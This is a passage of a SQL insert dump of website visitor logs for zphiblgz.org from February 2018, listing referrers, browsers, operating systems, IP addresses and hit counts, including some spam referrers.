','173.252.84.87','000',1,0),(22132,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.49','000',2,0),(22133,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.145','000',1,0),(22134,'2018-02-15','https://zphiblgz.org','Chrome','Linux','46.0.2490.80','','103.208.246.231','000',1,0),(22135,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.11','000',1,0),(22136,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.208','000',1,0),(22137,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.224','000',3,0),(22138,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.115','000',2,0),(22139,'2018-02-15','https://www.google.com/','Chrome','Android','64.0.3282.137','','73.200.189.209','000',2,0),(22140,'2018-02-15','https://zphiblgz.org','Firefox','Linux','24.0','','73.200.189.209','000',12,0),(22141,'2018-02-15','https://zphiblgz.org','Safari','iPhone','11.0','','73.250.70.213','000',5,0),(22142,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.197','000',1,0),(22143,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.142','000',1,0),(22144,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.216','000',1,0),(22145,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.200','000',1,0),(22146,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.208','000',3,0),(22147,'2018-02-15','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(22148,'2018-02-15','http://site.ru','Chrome','Windows','5.0.375.99','','31.148.96.49','000',1,0),(22149,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.230','000',1,0),(22150,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.253','000',1,0),(22151,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.114','000',1,0),(22152,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.225','000',1,0),(22153,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.184','000',2,0),(22154,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.17','000',1,0),(22155,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.171','000',1,0),(22156,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.198','000',1,0),(22157,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.213','000',1,0),(22158,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.52','000',3,0),(22159,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.205','000',1,0),(22160,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.87','000',1,0),(22161,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.56','000',1,0),(22162,'2018-02-15','http://raschtextil.com.ua/','Unknown','Unknown','Unknown','','46.118.116.121','000',2,0),(22163,'2018-02-15','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.27','000',1,0),(22164,'2018-02-15','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.27','000',1,0),(22165,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.251','000',2,0),(22166,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.117','000',2,0),(22167,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.198','000',2,0),(22168,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.215','000',1,0),(22169,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.99','000',1,0),(22170,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.114','000',2,0),(22171,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.118','000',1,0),(22172,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.230','000',3,0),(22173,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.119','000',2,0),(22174,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.27','000',1,0),(22175,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.38','000',3,0),(22176,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.229','000',2,0),(22177,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.84','000',2,0),(22178,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.214','000',1,0),(22179,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.252','000',2,0),(22180,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.151','000',1,0),(22181,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.151','000',1,0),(22182,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.152','000',1,0),(22183,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.116','000',1,0),(22184,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.82','000',1,0),(22185,'2018-02-15','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','73.212.79.132','000',1,0),(22186,'2018-02-15','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(22187,'2018-02-15','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.31','000',1,0),(22188,'2018-02-15','http://site.ru','Chrome','Windows','5.0.375.99','','212.193.252.39','000',1,0),(22189,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.4','000',3,0),(22190,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.162','000',2,0),(22191,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.220','000',2,0),(22192,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.100','000',1,0),(22193,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.166','000',1,0),(22194,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.84','000',1,0),(22195,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.116','000',1,0),(22196,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.221','000',1,0),(22197,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.201','000',4,0),(22198,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.208','000',1,0),(22199,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.208','000',1,0),(22200,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.114','000',1,0),(22201,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.206','000',1,0),(22202,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.24','000',1,0),(22203,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.119','000',1,0),(22204,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.119','000',1,0),(22205,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.207','000',1,0),(22206,'2018-02-15','https://zphiblgz.org','Chrome','Windows','64.0.3282.167','','73.173.254.31','000',3,0),(22207,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.12','000',1,0),(22208,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.77','000',1,0),(22209,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.87','000',3,0),(22210,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.52','000',1,0),(22211,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.181','000',1,0),(22212,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.112','000',1,0),(22213,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.217','000',2,0),(22214,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.113','000',1,0),(22215,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.32','000',2,0),(22216,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.204','000',1,0),(22217,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.218','000',1,0),(22218,'2018-02-15','https://zphiblgz.org','Firefox','Macintosh','37.0','','107.152.203.58','000',2,0),(22219,'2018-02-15','http://site.ru','Chrome','Windows','5.0.375.99','','192.185.2.151','000',1,0),(22220,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.252','000',1,0),(22221,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.136','000',1,0),(22222,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.17','000',1,0),(22223,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.145','000',2,0),(22224,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.173','000',1,0),(22225,'2018-02-15','https://zphiblgz.org/scholarship/recommendation/','Chrome','Windows','64.0.3282.167','','71.121.235.128','000',2,0),(22226,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.103','000',1,0),(22227,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.77','000',1,0),(22228,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.114','000',1,0),(22229,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.81','000',1,0),(22230,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.88','000',1,0),(22231,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.116','000',2,0),(22232,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.79','000',1,0),(22233,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.226','000',2,0),(22234,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.115','000',2,0),(22235,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.234','000',1,0),(22236,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.225','000',2,0),(22237,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.184','000',2,0),(22238,'2018-02-15','https://zphiblgz.org','Firefox','Windows','40.1','','41.227.253.19','000',2,0),(22239,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.169','000',1,0),(22240,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.131','000',1,0),(22241,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.19','000',1,0),(22242,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.3','000',2,0),(22243,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.101','000',1,0),(22244,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.153','000',1,0),(22245,'2018-02-15','http://strady.org.ua/','MSIE','Windows','6.0','','46.211.13.134','000',3,0),(22246,'2018-02-15','http://site.ru','Chrome','Windows','5.0.375.99','','148.251.20.87','000',2,0),(22247,'2018-02-15','http://site.ru','Chrome','Windows','5.0.375.99','','50.87.144.145','000',1,0),(22248,'2018-02-15','http://www.bing.com/search?q=phi%20beta%20sigma%20howard%20county&pc=cosp&ptag=C1N0822D010118A316A5D3C6E&form=CONBDF&conlogo=CT3210127','Firefox','Macintosh','57.0','','71.127.150.254','000',13,0),(22249,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.97','000',1,0),(22250,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.120','000',1,0),(22251,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.181','000',1,0),(22252,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.178','000',1,0),(22253,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.57','000',1,0),(22254,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.216','000',2,0),(22255,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.55','000',1,0),(22256,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.117','000',1,0),(22257,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.43','000',1,0),(22258,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.183','000',1,0),(22259,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.73','000',1,0),(22260,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.171','000',2,0),(22261,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','34.236.56.99','000',1,0),(22262,'2018-02-15','https://www.google.com/','Safari','Macintosh','11.0.3','','73.180.211.5','000',6,0),(22263,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.30','000',2,0),(22264,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.39','000',1,0),(22265,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.64','000',2,0),(22266,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.123','000',1,0),(22267,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.21','000',1,0),(22268,'2018-02-15','http://spy-app.info/mobile-spy-app/','MSIE','Windows','6.0','','178.137.178.122','000',3,0),(22269,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.196','000',1,0),(22270,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.197','000',2,0),(22271,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.54','000',1,0),(22272,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.166','000',2,0),(22273,'2018-02-15','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(22274,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.199','000',2,0),(22275,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.237','000',2,0),(22276,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.196','000',1,0),(22277,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.109','000',1,0),(22278,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.118','000',2,0),(22279,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.174','000',1,0),(22280,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.23','000',1,0),(22281,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.185','000',1,0),(22282,'2018-02-15','http://site.ru','Chrome','Windows','5.0.375.99','','204.93.167.44','000',1,0),(22283,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.10','000',1,0),(22284,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.227','000',1,0),(22285,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.230','000',1,0),(22286,'2018-02-15','http://www.zphibmaryland.org/chapters/','Chrome','Windows','64.0.3282.140','','98.233.119.78','000',7,0),(22287,'2018-02-15','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(22288,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.125','000',1,0),(22289,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.192','000',1,0),(22290,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.240','000',1,0),(22291,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.185','000',2,0),(22292,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.215','000',1,0),(22293,'2018-02-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.17','000',1,0),(22294,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.180','000',3,0),(22295,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.202','000',4,0),(22296,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.130','000',3,0),(22297,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.99','000',1,0),(22298,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.132','000',1,0),(22299,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.115','000',1,0),(22300,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.174','000',1,0),(22301,'2018-02-16','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','138.246.253.19','000',1,0),(22302,'2018-02-16','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','68.134.12.220','000',2,0),(22303,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.114','000',1,0),(22304,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.118','000',2,0),(22305,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.204','000',4,0),(22306,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.205','000',2,0),(22307,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.57','000',1,0),(22308,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.194','000',2,0),(22309,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.24','000',1,0),(22310,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.86','000',3,0),(22311,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.61','000',3,0),(22312,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.29','000',1,0),(22313,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.78','000',1,0),(22314,'2018-02-16','https://zphiblgz.org/','Opera Next','Windows','40.6.1077.6349','','77.72.83.71','000',1,0),(22315,'2018-02-16','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.35','000',1,0),(22316,'2018-02-16','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.35','000',1,0),(22317,'2018-02-16','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.35','000',1,0),(22318,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','74.220.219.144','000',2,0),(22319,'2018-02-16','https://zphiblgz.org','Firefox','Windows','40.1','','66.96.228.22','000',2,0),(22320,'2018-02-16','http://online-sbank.ru/','MSIE','Windows','6.0','','178.137.16.45','000',5,0),(22321,'2018-02-16','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(22322,'2018-02-16','http://zphiblgz.org/','Firefox','Windows','40.0','','188.165.4.128','000',2,0),(22323,'2018-02-16','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.195.155','000',1,0),(22324,'2018-02-16','https://zphiblgz.org/service/','MSIE','Windows','10.0','','178.20.55.18','000',1,0),(22325,'2018-02-16','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.170','000',3,0),(22326,'2018-02-16','https://zphiblgz.org','python-requests','Unknown','2.9.1','','67.137.36.66','000',1,0),(22327,'2018-02-16','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(22328,'2018-02-16','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.32','000',1,0),(22329,'2018-02-16','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.164','000',3,0),(22330,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','94.130.23.138','000',2,0),(22331,'2018-02-16','http://zphiblgz.org','Chrome','Windows','62.0.3202.94','','196.247.213.2','000',4,0),(22332,'2018-02-16','https://zphiblgz.org','MSIE','Windows','6.0','','204.101.161.159','000',1,0),(22333,'2018-02-16','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.1','000',3,0),(22334,'2018-02-16','http://10.220.1.2:8085/redirect.php?url=https://zphiblgz.org/service/&referer=http://www.google.com','MSIE','Windows','11.0','','204.188.220.253','000',2,0),(22335,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','193.106.248.73','000',1,0),(22336,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','80.87.203.2','000',2,0),(22337,'2018-02-16','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.22','000',5,0),(22338,'2018-02-16','https://zphiblgz.org','MSIE','Windows','11.0','','73.133.120.5','000',5,0),(22339,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','211.55.19.11','000',2,0),(22340,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','176.28.9.85','000',1,0),(22341,'2018-02-16','https://zphiblgz.org','Chrome','Android','63.0.3239.111','','174.205.19.172','000',2,0),(22342,'2018-02-16','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.31','000',1,0),(22343,'2018-02-16','https://zphiblgz.org','Safari','iPhone','11.0','','76.100.1.139','000',5,0),(22344,'2018-02-16','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwivxoid0arZAhWFw4MKHZVVCUEQFggmMAA&url=https%3A%2F%2Fzphiblgz.org%2Fservice%2F&usg=AOvVaw3W57ZipwDq_bi9HRINaEQ4','MSIE','Windows','11.0','','50.205.32.210','000',3,0),(22345,'2018-02-16','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(22346,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','69.89.31.117','000',1,0),(22347,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','178.210.68.74','000',2,0),(22348,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','185.197.128.179','000',2,0),(22349,'2018-02-16','http://pornosemki.info/','MSIE','Windows','6.0','','134.249.48.151','000',10,0),(22350,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.181','000',2,0),(22351,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.34','000',3,0),(22352,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.60','000',2,0),(22353,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.249','000',1,0),(22354,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.95.31','000',2,0),(22355,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.4','000',1,0),(22356,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.213','000',1,0),(22357,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.244','000',1,0),(22358,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.167','000',1,0),(22359,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.246','000',1,0),(22360,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','95.211.94.107','000',1,0),(22361,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.85','000',3,0),(22362,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.241','000',1,0),(22363,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.209','000',2,0),(22364,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.136','000',1,0),(22365,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.216','000',1,0),(22366,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.124','000',2,0),(22367,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.233','000',1,0),(22368,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.213','000',6,0),(22369,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.206','000',1,0),(22370,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.11','000',1,0),(22371,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.19','000',2,0),(22372,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.113','000',1,0),(22373,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.24','000',3,0),(22374,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.209','000',1,0),(22375,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.81','000',1,0),(22376,'2018-02-16','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.31','000',1,0),(22377,'2018-02-16','http://site.ru','Chrome','Windows','5.0.375.99','','213.132.201.15','000',1,0),(22378,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.169','000',1,0),(22379,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.228','000',2,0),(22380,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.83','000',2,0),(22381,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.236','000',1,0),(22382,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.196','000',1,0),(22383,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.13','000',1,0),(22384,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.113','000',3,0),(22385,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.122','000',1,0),(22386,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.16','000',1,0),(22387,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.209','000',2,0),(22388,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.79','000',3,0),(22389,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.203','000',2,0),(22390,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.216','000',2,0),(22391,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.225','000',1,0),(22392,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.117','000',2,0),(22393,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.201','000',1,0),(22394,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.139','000',2,0),(22395,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.222','000',2,0),(22396,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.19','000',1,0),(22397,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.142','000',2,0),(22398,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.75','000',1,0),(22399,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.115','000',3,0),(22400,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.242','000',2,0),(22401,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.36','000',1,0),(22402,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.250','000',1,0),(22403,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.217','000',1,0),(22404,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.22','000',1,0),(22405,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.50','000',2,0),(22406,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.192','000',1,0),(22407,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.18','000',1,0),(22408,'2018-02-16','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(22409,'2018-02-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.